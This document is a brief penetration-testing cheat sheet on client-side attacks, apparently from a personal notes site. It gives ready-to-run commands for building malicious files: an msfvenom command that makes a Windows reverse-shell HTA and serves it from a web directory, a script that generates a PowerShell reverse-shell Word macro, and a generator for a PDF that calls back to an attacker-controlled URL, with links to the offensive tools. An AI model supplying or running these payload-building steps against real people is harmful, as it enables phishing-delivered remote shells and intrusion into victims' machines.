Page cover

Client-Side Attacks

HTA Attack in Action

-> Get web browser name, operating system, device type https://explore.whatismybrowser.com/useragents/parse/#parse-useragentarrow-up-right

-> Creating a malicious .hta with msfvenom

sudo msfvenom -p windows/shell_reverse_tcp LHOST=<ip> LPORT=<port> -f hta-psh -o /var/www/html/evil.hta

Microsoft Word Macro Attack

-> Generate a malicious macro for reverse shell in powershell using base64 for .doc

python evil_macro.py -l <ip> -p <port> -o macro.txt

https://github.com/rodolfomarianocy/Evil-Macro/arrow-up-right

Malicious PDF

-> Malicious PDF Generator

python3 malicious-pdf.py burp-collaborator-url

https://github.com/jonaslejon/malicious-pdfarrow-up-right

-> evilpdf https://github.com/superzerosec/evilpdfarrow-up-right

Last updated